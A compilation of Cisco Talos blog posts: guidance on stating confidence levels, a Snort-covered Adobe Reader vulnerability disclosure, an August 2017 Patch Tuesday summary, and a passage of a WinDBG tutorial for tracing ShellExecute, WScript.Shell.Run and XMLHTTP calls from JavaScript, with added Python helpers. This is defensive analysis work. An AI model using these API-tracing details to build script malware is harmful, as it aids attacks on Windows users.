Channel: Cisco Talos Blog

On Conveying Doubt

This post was authored by Matt Olney.

Typically, Talos has the luxury of time when conducting research. We can carefully draft a report that clearly lays out the evidence and leads the reader to a clear understanding of our well supported findings. A great deal of time is spent ensuring that the correct words and logical paths are used so that we are both absolutely clear and absolutely correct.  Frequently, the goal is to inform and educate readers about specific threats or techniques.

There are times, however, when we are documenting our research in something very close to real-time. The recent WannaCry and Nyetya events are excellent examples of this. Our goal changes here, as does our process. Here we are racing the clock to get accurate, impactful, and actionable information to help customers react even while new information is coming in.

In these situations, and in certain other kinds of investigations, it is necessary for us to talk about something when we aren’t 100% certain we are correct.  I’ll provide two examples from our Nyetya blog posts:

Example 1:

“Given the circumstances of this attack, Talos assesses with high confidence that the intent of the actor behind Nyetya was destructive in nature and not economically motivated.”

This is our response to customers who were asking “If I pay will I get my data back?”. There were a number of indications that made us think that this was unlikely, but we couldn’t necessarily prove that there was no way it could occur at the time we published. We weren’t certain, but it was important to share our analysis quickly because customers needed information in order to make time-sensitive decisions, so we did so with a clear statement that there was room for error.

Example 2:

“This is a significant loss in operational capability, and the Threat Intelligence and Interdiction team assesses with moderate confidence that it is unlikely that they would have expended this capability without confidence that they now have or can easily obtain similar capability in target networks of highest priority to the threat actor.”

Here we are speaking about an actor’s thought process.  Obviously we aren’t in a position to authoritatively speak about what is going through an actor’s head.  But we can look at a broad set of circumstances, analyze them in the light of our past observations and experiences, and then try to understand what underlying meaning they might have.  Based on what we saw, we thought it important to express that the actor may have additional capability it had not shown, so again, we spoke in plain language that gave the reader information they could evaluate.

Speaking with doubt doesn’t mean guessing.  At Talos it means applying experience and knowledge to a set of information that is incomplete and trying to extract actionable intelligence from that information.  When we document our findings externally, we are under an obligation to be crystal clear if we are engaging in some form of speculation in order to develop a thoughtful assessment based on strong indicators.  This doesn’t make the information less valuable, but it does allow the reader to correctly weigh the information when prioritizing their own response.  As we move ahead, when Talos communicates doubt, we will do so using the following as guidance:

Phrase                                              Estimated % Confidence
Low Confidence / Possible / Unlikely                <35%
Moderate Confidence / Probable / Likely             35% - 69%
High Confidence / Highly Probable / Highly Likely   >70%

Our primary mission is to place into our reader’s hands the information they need to defend their systems and their networks.  We can’t always wait until we are 100% certain of findings, particularly while we are in the midst of an incident.  By utilizing this language, we can share findings earlier and give customers the ability to evaluate our information and apply it to their defenses if necessary.

Vulnerability Spotlight: Adobe Reader DC Parser Confusion

Parser vulnerabilities in common software packages such as Adobe Acrobat Reader pose a significant security risk to large portions of the internet. The fact that these software packages typically have large footprints often gives attackers a broad attack surface they can potentially leverage for malicious purposes. Thus, identifying vulnerabilities and responsibly disclosing them is critical to eliminating attack vectors that may otherwise be exploited.

Today, Talos is disclosing a vulnerability that has been identified in Adobe Acrobat Reader DC. The vulnerability, if exploited, could lead to arbitrary code execution on affected devices. As part of the coordinated effort to responsibly disclose the vulnerability, Adobe has released a software update that addresses the vulnerability. Additionally, Talos has developed Snort rules that detect attempts to exploit the flaw.

Vulnerability Details

This vulnerability was identified by Aleksandar Nikolic of Talos.

TALOS-2017-0361 / CVE-2017-11263 is an arbitrary code execution vulnerability in Adobe Acrobat Reader DC that manifests as a parser confusion vulnerability in the AcroForm parsing functionality. A specifically crafted PDF document designed to trigger this vulnerability could cause the parser to enter an unintended state. As a result, an attacker could abuse an unchecked pointer in memory to access or overwrite arbitrary memory inside the process. This could ultimately lead to arbitrary code execution. 

The vulnerability could be leveraged in the context of a social engineering attack, where an attacker sends the intended victim an email containing a malicious PDF. 

Coverage

Talos has developed the following Snort rules to detect attempts to exploit the vulnerability. Note that these rules are subject to change pending additional vulnerability information. For the most current information, please visit your Firepower Management Center or Snort.org.

Snort Rules: 
  • 43167-43168
For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal: http://www.talosintelligence.com/vulnerability-reports/

To review our Vulnerability Disclosure Policy, please visit this site:

Microsoft Patch Tuesday - August 2017

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 48 new vulnerabilities with 25 of them rated critical, 21 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Remote Desktop Protocol, Sharepoint, SQL Server, the Windows Subsystem for Linux, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.


Vulnerabilities Rated Critical

The following vulnerabilities are rated "critical" by Microsoft:
The following briefly describes these vulnerabilities.

Multiple CVEs - Scripting Engine Memory Corruption Vulnerability


Multiple vulnerabilities have been identified in the Microsoft Browser JavaScript engine that could allow remote code execution to occur in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory, resulting in memory corruption. Exploitation of these vulnerabilities is achievable if a user visits a specifically crafted web page that contains JavaScript designed to exploit one or more of these vulnerabilities.

The following is a list of CVEs that reflect these vulnerabilities:
  • CVE-2017-8634
  • CVE-2017-8635
  • CVE-2017-8636
  • CVE-2017-8638
  • CVE-2017-8639
  • CVE-2017-8640
  • CVE-2017-8641
  • CVE-2017-8645
  • CVE-2017-8646
  • CVE-2017-8647
  • CVE-2017-8655
  • CVE-2017-8656
  • CVE-2017-8657
  • CVE-2017-8670
  • CVE-2017-8671
  • CVE-2017-8672
  • CVE-2017-8674

CVE-2017-8653, CVE-2017-8669 - Microsoft Browser Memory Corruption Vulnerabilities


Two vulnerabilities have been identified in Edge and Internet Explorer that could result in remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specifically crafted webpage that exploits one of the flaws.

CVE-2017-8661 - Microsoft Edge Memory Corruption Vulnerability


A vulnerability in Microsoft Edge has been identified that could allow an attacker to execute arbitrary code on a targeted host. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-0250 - Microsoft JET Database Engine Remote Code Execution Vulnerability


A buffer overflow vulnerability in the Microsoft JET Database Engine has been identified that could allow an attacker to execute arbitrary code in the context of the current user. This vulnerability can be triggered by opening or previewing a specifically crafted database file on a vulnerable system. Scenarios where this could occur could be an email-based attack where an attacker sends the targeted user a malicious database file to be opened.

CVE-2017-8591 - Windows IME Remote Code Execution Vulnerability


An arbitrary code execution vulnerability in the Windows Input Method Editor (IME) has been identified that could allow an attacker to execute code in the context of the current user. The vulnerability manifests due to improper handling of parameters in a method of a DCOM class. Note that DCOM server is a component of Microsoft Windows that is installed regardless of the language/IMEs used. An attacker who exploits this vulnerability can instantiate the DCOM class and exploit the system, even if IME is disabled.

CVE-2017-0293 - Windows PDF Remote Code Execution Vulnerability


A vulnerability in Windows PDF has been identified that could allow an attacker to execute arbitrary code on a targeted host. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who open a specifically crafted PDF file or who visit a web page containing a specifically crafted PDF could exploit this vulnerability.

CVE-2017-8620 - Windows Search Remote Code Execution Vulnerability


A vulnerability in Windows Search has been identified that could allow an attacker to remotely execute arbitrary code on a targeted host. This vulnerability manifests due to improper handling of objects in memory. Upon successful exploitation, an attacker with physical access to the affected host could elevate privileges to that of an administrator. This vulnerability could also be exploited in an enterprise environment via an SMB connection to the affected host.

CVE-2017-8622 - Windows Subsystem for Linux Elevation of Privilege Vulnerability


A vulnerability in the Windows Subsystem for Linux has been identified that could be used to escalate a user's privileges to that of an administrator. This vulnerability manifests due to how the Windows Subsystem for Linux handles NT pipes. Successful exploitation could allow a local, authenticated attacker to execute code as an administrator.

Vulnerabilities Rated Important

The following vulnerabilities are rated "important" by Microsoft:
The following briefly describes these vulnerabilities.

CVE-2017-8644, CVE-2017-8652, CVE-2017-8662 - Microsoft Edge Information Disclosure Vulnerability


Multiple vulnerabilities in Microsoft Edge have been identified that could allow an attacker to discover sensitive information regarding the targeted system. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities could give an attacker the information necessary to further exploit additional vulnerabilities on the system.

CVE-2017-8503 - Microsoft Edge Elevation of Privilege Vulnerability


A vulnerability in Microsoft Edge has been identified that could result in privilege escalation if exploited. This vulnerability manifests as an AppContainer sandbox escape within the browser. Successful exploitation could result in a user obtaining elevated privileges. Note that this vulnerability does not allow arbitrary code execution. However, if used in conjunction with one or more other vulnerabilities, an attacker could execute arbitrary code in the context of an administrator.

CVE-2017-8642 - Microsoft Edge Elevation of Privilege Vulnerability


A vulnerability in Microsoft Edge has been identified that could result in privilege escalation if exploited. This vulnerability manifests due to improper validation of JavaScript in certain circumstances. Successful exploitation could elevate privileges in affected versions of Microsoft Edge. Note that this vulnerability does not permit arbitrary code execution. However, if used in conjunction with another vulnerability, an attacker could execute arbitrary code with medium-level integrity, that is, in the context of the current user. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability


A vulnerability in Internet Explorer has been identified that could be exploited to bypass a security feature. This vulnerability manifests due to Internet Explorer improperly validating User Mode Code Integrity (UMCI) policies. Successful exploitation of this vulnerability could allow an attacker to execute unsigned malicious code as if it were signed. Exploiting this vulnerability is possible if a user visits a specifically crafted website designed to exploit the flaw.

CVE-2017-8691 - Express Compressed Fonts Remote Code Execution Vulnerability


A vulnerability in the Windows Font library has been identified that could permit an attacker to execute arbitrary code in the context of the current user. This vulnerability manifests due to the library improperly handling specially crafted embedded fonts. Exploitation of this vulnerability is possible if a user visits a specifically crafted web page or if a user opens a specifically crafted file that is designed to exploit this vulnerability.

CVE-2017-8654 - Microsoft Office SharePoint XSS Vulnerability


A vulnerability in Microsoft Sharepoint has been identified that could allow an attacker to execute a cross-site scripting (XSS) attack. This vulnerability manifests due to Sharepoint Server improperly sanitizing specific web requests from a user. Successful exploitation of this vulnerability could allow an attacker to execute script in the context of the current user, read content that the attacker would not otherwise have permission to view, or execute actions on behalf of the affected user.

CVE-2017-8516 - Microsoft SQL Server Analysis Services Information Disclosure Vulnerability


A vulnerability in Microsoft SQL Server Analysis Services has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to SQL Server Analysis Services improperly enforcing permissions. An attacker with valid credentials that permit access to the affected SQL Server could exploit this vulnerability to gain additional database and file information that should otherwise not be permitted.

CVE-2017-8659 - Scripting Engine Information Disclosure Vulnerability


A vulnerability in the Chakra JavaScript Engine has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining information that could then be used to further exploit the system. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-8637 - Scripting Engine Security Feature Bypass Vulnerability


A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass a security feature. This vulnerability manifests due to the way memory is accessed in "code compiled by the Edge Just-In-Time (JIT) compiler that allows Arbitrary Code Guard (ACG) to be bypassed". Note that exploiting this vulnerability does not result in arbitrary code execution. However, if used in combination with another vulnerability, an attacker could execute arbitrary code on the targeted system. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-8668 - Volume Manager Extension Driver Information Disclosure Vulnerability


A vulnerability in the Volume Manager Extension Driver has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to the Volume Manager Extension Driver improperly providing kernel information. Successful exploitation could allow an attacker to gain information that could be used to further compromise a targeted system.

CVE-2017-8593 - Win32k Elevation of Privilege Vulnerability


A vulnerability in the Win32k component in Windows has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specifically crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-8666 - Win32k Information Disclosure Vulnerability


A vulnerability in the Win32k component in Windows has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to the Win32k component improperly providing kernel information. Successful exploitation could allow an attacker to gain information that could be used to further compromise a targeted system.

CVE-2017-8624 - Windows CLFS Elevation of Privilege Vulnerability


A vulnerability in the Windows Common Log File System (CLFS) driver has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specifically crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-8633 - Windows Error Reporting Elevation of Privilege Vulnerability


A vulnerability in the Windows Error Reporting (WER) has been identified that could allow a privilege escalation attack to occur. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system.

CVE-2017-8623 - Windows Hyper-V Denial of Service Vulnerability


A vulnerability in the Microsoft Hyper-V Network Switch has been identified that could allow a denial of service attack to occur. This vulnerability manifests due to improper validation of input "from a privileged user on a guest operating system." Successful exploitation of this vulnerability could cause the host server to crash. Exploiting this flaw requires that a privileged user on the guest operating system run a specifically crafted executable that exploits this vulnerability, thus causing the host system to crash.

CVE-2017-8664 - Windows Hyper-V Remote Code Execution Vulnerability


A vulnerability in Windows Hyper-V has been identified that could allow arbitrary code execution on the hypervisor system to occur. This vulnerability manifests due to improperly validating "input from an authenticated user on a guest operating system." Exploitation of the vulnerability could be achieved if an attacker runs a specifically crafted application within a guest operating system that causes Hyper-V to execute arbitrary code.

CVE-2017-0174 - Windows NetBIOS Denial of Service Vulnerability


A vulnerability in Microsoft Windows has been identified that could allow a denial of service attack to occur. This vulnerability manifests due to Windows improperly handling NetBIOS packets. Successful exploitation of this vulnerability could cause the host to become unresponsive. An attacker who sends a series of specifically crafted TCP packets to the targeted system could create a permanent denial of service condition.

CVE-2017-8673 - Windows Remote Desktop Protocol Denial of Service Vulnerability


A vulnerability in Remote Desktop Protocol (RDP) has been identified that could allow a denial of service attack to occur. This vulnerability manifests due to the target system improperly handling RDP requests once an attacker has connected to it. Successful exploitation of this vulnerability could cause the RDP service to become unresponsive.

CVE-2017-8627 - Windows Subsystem for Linux Denial of Service Vulnerability


A vulnerability in the Windows Subsystem for Linux has been identified that could allow a denial of service attack to occur. This vulnerability manifests due to the Subsystem improperly handling objects in memory. Successful exploitation of this vulnerability could cause the local system to become unresponsive.

Vulnerabilities Rated Moderate

The following vulnerabilities are rated "moderate" by Microsoft:
The following briefly describes these vulnerabilities.

CVE-2017-8650 - Microsoft Edge Security Feature Bypass Vulnerability


A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass a security feature. This vulnerability manifests due to improper enforcement of same-origin policies. Successful exploitation could allow an attacker to "access information from origins outside the current one." Users who visit a specifically crafted web page under the control of the attacker could be exploited.

CVE-2017-8651 - Internet Explorer Memory Corruption Vulnerability


A vulnerability in Internet Explorer has been identified that could allow an attacker to execute arbitrary code on a targeted host. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who visit a specifically crafted web page under the control of the attacker could be exploited.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.

Snort Rules:

  • 43847-43848
  • 43851-43852

WinDBG and JavaScript Analysis

This blog was authored by Paul Rascagneres.

Introduction


JavaScript is frequently used by malware authors to execute malicious code on Windows systems because it is powerful, natively available and rarely disabled. Our previous article on .NET analysis generated much interest relating to how to use WinDBG to analyse .js files. In this post we extend our description of using WinDBG to describe the analysis of JavaScript using the 64 bit version of wscript.exe. It is strongly recommended to read our previous article first.


Object Loading on Windows Systems


JavaScript often needs to load external objects in order to obtain access to additional features not included by default in the Windows interpreter. This can be achieved by using the ActiveXObject() API (to load ActiveX objects) or the WScript.CreateObject() API (to load COM objects). The mechanism behind these two APIs is the same: loading an external library to enable access to new objects. Here are two examples:
new ActiveXObject("Shell.Application");
WScript.CreateObject("Wscript.Shell");
The first step is to understand which library is behind these two objects. This information is stored in the registry. First we need to get the CLSID associated with the object name, which is stored under the following registry key: HKEY_CLASSES_ROOT\OBJECT_NAME\CLSID.

Here is an example for the Shell.Application object name:
This shows that the CLSID is {13709620-C279-11CE-A49E-444553540000}. With this information we are able to get the dll path of the object in HKEY_CLASSES_ROOT\CLSID\{THE_CLSID}:
In this case, the library in which the Shell.Application object is located is shell32.dll. With this information, we are able to start WinDBG in order to analyse object loading and execution.
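The registry lookup described above, as an added Python example (it is not the script.py from the post): the resolver follows ProgID to CLSID to the server DLL and prints the same fields the post's output shows. The sample registry fragment is constructed from the CLSID and DLL values given in the post; on Windows the same resolver can be pointed at the live registry through winreg.

```python
r"""Resolve a COM ProgID (for example "Shell.Application") to its CLSID and
hosting DLL by following the registry keys the post describes:

  HKEY_CLASSES_ROOT\<ProgID>\CLSID               (Default) -> {CLSID}
  HKEY_CLASSES_ROOT\CLSID\{CLSID}                (Default) -> description
  HKEY_CLASSES_ROOT\CLSID\{CLSID}\InprocServer32 (Default) -> DLL path

Added example, not the post's script.py. The resolver takes a reader callable,
so it can run against the live registry on Windows (winreg) or against the
constructed dict below anywhere else.
"""
from __future__ import annotations

import sys
from typing import Callable, Dict, Optional

# A reader maps a key path under HKEY_CLASSES_ROOT to that key's (Default)
# value, or None when the key does not exist.
Reader = Callable[[str], Optional[str]]


def dict_reader(fake_registry: Dict[str, str]) -> Reader:
    """Reader over a dict of key path -> (Default) value; paths are matched
    case-insensitively, as registry paths are."""
    table = {path.lower(): value for path, value in fake_registry.items()}
    return lambda path: table.get(path.lower())


def winreg_reader() -> Reader:
    """Reader backed by the live registry (Windows only)."""
    import winreg  # stdlib, but only present on Windows

    def read(path: str) -> Optional[str]:
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, path) as key:
                return str(winreg.QueryValue(key, None))  # the (Default) value
        except OSError:
            return None

    return read


def resolve_progid(progid: str, read: Reader) -> Dict[str, Optional[str]]:
    """Follow ProgID -> CLSID -> server DLL and return the fields printed by
    the post's script.py."""
    clsid = read(f"{progid}\\CLSID")
    if clsid is None:
        raise LookupError(f"no CLSID registered for ProgID {progid!r}")
    clsid = clsid.strip().upper()
    # In-process servers register InprocServer32; out-of-process servers use
    # LocalServer32 (an EXE), so fall back to that when no DLL is registered.
    server = (read(f"CLSID\\{clsid}\\InprocServer32")
              or read(f"CLSID\\{clsid}\\LocalServer32"))
    return {
        "Object Name": progid,
        "CLSID": clsid,
        "Description": read(f"CLSID\\{clsid}"),
        "dll": server,
    }


def format_report(info: Dict[str, Optional[str]]) -> str:
    """Render the result in the same "key: value" layout as the post's output."""
    return "\n".join(f"{key}: {value}" for key, value in info.items())


# Constructed registry fragment; the values are the ones the post's script.py
# output shows for the three objects analysed in the case studies.
SAMPLE_REGISTRY: Dict[str, str] = {
    r"Shell.Application\CLSID": "{13709620-C279-11CE-A49E-444553540000}",
    r"CLSID\{13709620-C279-11CE-A49E-444553540000}": "Shell Automation Service",
    r"CLSID\{13709620-C279-11CE-A49E-444553540000}\InprocServer32": r"%SystemRoot%\system32\shell32.dll",
    r"Wscript.Shell\CLSID": "{72C24DD5-D70A-438B-8A42-98424B88AFB8}",
    r"CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}": "Windows Script Host Shell Object",
    r"CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocServer32": r"C:\Windows\System32\wshom.ocx",
    r"MSXML2.XMLHTTP\CLSID": "{F6D90F16-9C73-11D3-B32E-00C04F990BB4}",
    r"CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}": "XML HTTP",
    r"CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InprocServer32": r"%SystemRoot%\System32\msxml3.dll",
}


if __name__ == "__main__":
    progid = sys.argv[1] if len(sys.argv) > 1 else "Shell.Application"
    reader = winreg_reader() if sys.platform == "win32" else dict_reader(SAMPLE_REGISTRY)
    print(format_report(resolve_progid(progid, reader)))
```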

WinDBG Analysis


The analysis of JavaScript execution is performed by debugging the wscript.exe binary. This can be executed with the following command:
"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe" C:\Windows\System32\wscript.exe c:\Users\User\to_be_analysed.js
The technique is usually the same:
  • Set a breakpoint on the load of the object's library;
  • Identify the function of interest and set a breakpoint on it;
  • Retrieve the arguments of the function.

Case Study #1: ActiveX Object


Consider the following code:
var oShell = new ActiveXObject("Shell.Application");
var commandtoRun = "calc.exe";
oShell.ShellExecute(commandtoRun,"","","","1");
The first task is to find where the "Shell.Application" library object is located in the registry:
c:\Users\user> script.py Shell.Application
Object Name: Shell.Application
CLSID: {13709620-C279-11CE-A49E-444553540000}
Description: Shell Automation Service
dll: %SystemRoot%\system32\shell32.dll
This tells us that we should analyse shell32.dll. Let's execute this script and introduce a breakpoint when the library is loaded:
0:000> sxe ld shell32 ; g
ModLoad: 00007fff`c6af0000 00007fff`c7f27000 C:\WINDOWS\System32\SHELL32.dll
ntdll!NtMapViewOfSection+0x14:
00007fff`c8e658a4 c3 ret
The next step is to identify the ShellExecute function:
0:000> x shell32!ShellExecute
Unfortunately, the function does not have the same name in JavaScript and in the library. However, we can search for it using a regular expression:
0:000> x shell32!ShellExecute*
00007fff`c6b13dd0 SHELL32!ShellExecuteExW (void)
00007fff`c6b13e44 SHELL32!ShellExecuteNormal (void)
00007fff`c6cb1630 SHELL32!ShellExecuteExA (<no parameter info>)
00007fff`c6fa8d58 SHELL32!ShellExecuteRegApp (<no parameter info>)
00007fff`c6bef560 SHELL32!ShellExecuteW (<no parameter info>)
00007fff`c6cb15a0 SHELL32!ShellExecuteA (<no parameter info>)
00007fff`c6fa9058 SHELL32!ShellExecuteRunApp (<no parameter info>)
In our case, we can add a breakpoint for ShellExecuteNormal:
0:000> bp shell32!ShellExecuteNormal
0:000> g
Breakpoint 0 hit
SHELL32!ShellExecuteNormal:
00007fff`c6b13e44 48895c2408 mov qword ptr [rsp+8],rbx ss:00000029`cb56c7a0=00000029cb56cc90
We can now retrieve the argument directly via the RCX register:
0:000> r $t1=poi(rcx+0x18);du $t1
000001ee`350d055c "calc.exe"
At first glance, it is not obvious why there is an offset of 0x18. This is because the argument passed to ShellExecuteNormal() is a pointer to a SHELLEXECUTEINFO structure; the Microsoft documentation of that structure shows that the member holding the file to execute sits at offset 0x18 in the 64-bit layout.
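Where the 0x18 comes from, as an added example that is not part of the original post: the 64-bit layout of SHELLEXECUTEINFOW mirrored with ctypes, from which the WinDBG expression for any member can be derived. It assumes a 64-bit Python, so that pointers are 8 bytes as in the x64 wscript.exe being debugged.

```python
"""Why the post reads the ShellExecuteNormal() argument from poi(rcx+0x18).

Added example, not from the original post. RCX points to a SHELLEXECUTEINFOW
structure; the class below mirrors its 64-bit layout with ctypes (field order
as documented by Microsoft, every pointer or handle modelled as c_void_p) so
that member offsets, and hence WinDBG expressions, can be derived without
windows.h. Assumes a 64-bit Python so pointers are 8 bytes wide.
"""
import ctypes
from ctypes import c_int, c_uint32, c_void_p


class SHELLEXECUTEINFOW(ctypes.Structure):
    _fields_ = [
        ("cbSize", c_uint32),        # 0x00
        ("fMask", c_uint32),         # 0x04
        ("hwnd", c_void_p),          # 0x08
        ("lpVerb", c_void_p),        # 0x10  LPCWSTR
        ("lpFile", c_void_p),        # 0x18  LPCWSTR: the "calc.exe" the post dumps
        ("lpParameters", c_void_p),  # 0x20  LPCWSTR
        ("lpDirectory", c_void_p),   # 0x28  LPCWSTR
        ("nShow", c_int),            # 0x30
        ("hInstApp", c_void_p),      # 0x38  (8-byte aligned, so 4 bytes of padding)
        ("lpIDList", c_void_p),      # 0x40
        ("lpClass", c_void_p),       # 0x48  LPCWSTR
        ("hkeyClass", c_void_p),     # 0x50
        ("dwHotKey", c_uint32),      # 0x58
        ("hIcon", c_void_p),         # 0x60  union { hIcon; hMonitor }
        ("hProcess", c_void_p),      # 0x68
    ]


# Members that hold pointers to wide strings, and so are dumped with "du".
WIDE_STRING_MEMBERS = {"lpVerb", "lpFile", "lpParameters", "lpDirectory", "lpClass"}


def member_offset(member: str) -> int:
    """Byte offset of a member inside the structure."""
    return getattr(SHELLEXECUTEINFOW, member).offset


def struct_size() -> int:
    """sizeof(SHELLEXECUTEINFOW); 112 bytes on x64."""
    return ctypes.sizeof(SHELLEXECUTEINFOW)


def windbg_dump_command(member: str, base_reg: str = "rcx") -> str:
    """WinDBG command that dumps a member, given the register holding the
    structure pointer. For lpFile this yields "du poi(rcx+0x18)", which is
    equivalent to the post's "r $t1=poi(rcx+0x18);du $t1"."""
    field = getattr(SHELLEXECUTEINFOW, member)
    if member in WIDE_STRING_MEMBERS:
        return f"du poi({base_reg}+{field.offset:#x})"
    # Scalars and handles: dump one qword or dword in place.
    verb = "dq" if field.size == 8 else "dd"
    return f"{verb} {base_reg}+{field.offset:#x} L1"


if __name__ == "__main__":
    for name, _ in SHELLEXECUTEINFOW._fields_:
        print(f"{name:<13} {member_offset(name):#06x}  {windbg_dump_command(name)}")
    print("sizeof:", struct_size())
```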

Case Study #2: WScript Shell Object


Let's consider a second example:
var shell = WScript.CreateObject("Wscript.Shell");
var command = "calc.exe";
shell.Run(command, true, false);
As previously, the first task consists of finding the library where Wscript.Shell is located:
c:\Users\user> script.py Wscript.Shell
Object Name: Wscript.Shell
CLSID: {72C24DD5-D70A-438B-8A42-98424B88AFB8}
Description: Windows Script Host Shell Object
dll: C:\Windows\System32\wshom.ocx
Let's try to identify the function name:
0:000> sxe ld wshom
0:000> g
ModLoad: 00007fff`b5630000 00007fff`b5657000 C:\Windows\System32\wshom.ocx
ntdll!NtMapViewOfSection+0x14:
00007fff`c8e658a4 c3 ret
0:000> x wshom!*Run*
00007fff`b5640930 wshom!CUnknown::InnerUnknown::`vftable' = <no type information>
00007fff`b563d530 wshom!CUnknown::InnerUnknown::QueryInterface (<no parameter info>)
00007fff`b5648084 wshom!_IMPORT_DESCRIPTOR_ScrRun = <no type information>
00007fff`b563d570 wshom!CUnknown::InnerUnknown::Release (<no parameter info>)
00007fff`b5643d30 wshom!ScrRun_NULL_THUNK_DATA = <no type information>
00007fff`b563bbb0 wshom!CWshShell::Run (<no parameter info>)
00007fff`b5631000 wshom!CUnknown::InnerUnknown::AddRef (<no parameter info>)
00007fff`b5644518 wshom!LIBID_IWshRuntimeLibrary = <no type information>)
The function is wshom!CWshShell::Run, we can breakpoint on this and check for the argument:
0:000> bp wshom!CWshShell::Run
0:000> g
Breakpoint 0 hit
wshom!CWshShell::Run:
00007fff`b563bbb0 48895c2408 mov qword ptr [rsp+8],rbx ss:00000020`7ccfd520=0000013f3d650420
0:000> du rdx
0000013f`3d65055c "calc.exe"
Unlike the previous case study, the argument is directly a string rather than a structure, so no offset is needed to retrieve it.

Case Study #3: WScript XMLHTTP Object


Here is the source code for this case study:
var httpStream = WScript.CreateObject("MSXML2.XMLHTTP");
httpStream.open("GET", 'http://blog.talosintelligence.com');
httpStream.send();
The library associated with the MSXML2.XMLHTTP object:
c:\Users\user> script.py MSXML2.XMLHTTP
Object Name: MSXML2.XMLHTTP
CLSID: {F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Description: XML HTTP
dll: %SystemRoot%\System32\msxml3.dll
We can use the same technique as before:
0:000> sxe ld msxml3
0:000> g
ModLoad: 00007fff`8dc40000 00007fff`8de68000 C:\WINDOWS\System32\msxml3.dll
ntdll!NtMapViewOfSection+0x14:
00007fff`c8e658a4 c3 ret
This time, we use a regular expression to breakpoint on all the APIs that contain the word "Open":
0:000> bm msxml3!*Open*
1: 00007fff`8dc43030 @!"msxml3!ErrorHelper::CHTMLWindow2::open"
breakpoint 1 redefined
1: 00007fff`8dc43030 @!"msxml3!FakeHTMLDoc::open"
2: 00007fff`8dd4c5fc @!"msxml3!HTTPStream::OpenRequest"
3: 00007fff`8dcaa407 @!"msxml3!_imp_load_CertOpenStore"
breakpoint 1 redefined
1: 00007fff`8dc43030 @!"msxml3!ErrorHelper::CHTMLWindow2::get_opener"
4: 00007fff`8dc48eb4 @!"msxml3!ContentModel::openGroup"
5: 00007fff`8dd4cb00 @!"msxml3!HTTPStream::deferedOpen"
breakpoint 1 redefined
1: 00007fff`8dc43030 @!"msxml3!ErrorHelper::CHTMLDocument2::open"
breakpoint 1 redefined
1: 00007fff`8dc43030 @!"msxml3!ErrorHelper::CHTMLWindow2::put_opener"
6: 00007fff`8dd4a050 @!"msxml3!URLMONRequest::open"
7: 00007fff`8dc8f4d0 @!"msxml3!FileStream::deferedOpen"
8: 00007fff`8dd34e80 @!"msxml3!XMLHttp::open"
9: 00007fff`8dc597e0 @!"msxml3!URLMONStream::deferedOpen"
10: 00007fff`8dc70ddc @!"msxml3!NamespaceMgr::popEntry"
11: 00007fff`8dcaa3bf @!"msxml3!_imp_load_WinHttpOpen"
12: 00007fff`8dcaa3e3 @!"msxml3!_imp_load_WinHttpOpenRequest"
13: 00007fff`8dd47340 @!"msxml3!HTTPRequest::open"
14: 00007fff`8dd47660 @!"msxml3!HTTPRequest::openWithCredentials"
15: 00007fff`8dc8f37c @!"msxml3!FileStream::open"
16: 00007fff`8dd4c128 @!"msxml3!URLStream::OpenPreloadResource"
17: 00007fff`8dd4b410 @!"msxml3!URLRequest::open"
0:000> g
Breakpoint 8 hit
msxml3!XMLHttp::open:
00007fff`8dd34e80 488bc4 mov rax,rsp
We see that the API actually used is XMLHttp::open(); from there we can obtain the arguments:
0:000> du rdx
00000173`311a0568 "GET"
0:000> du r8
00000173`311a0578 "http://blog.talosintelligence.co"
00000173`311a05b8 "m"
These arguments are two strings rather than a structure and can be retrieved without offset.

Case Study #4: Eval() Function


The eval() function is frequently used by malware authors to obfuscate code execution. This function is native to JavaScript and does not require an external library. Here is an example of eval() in use:
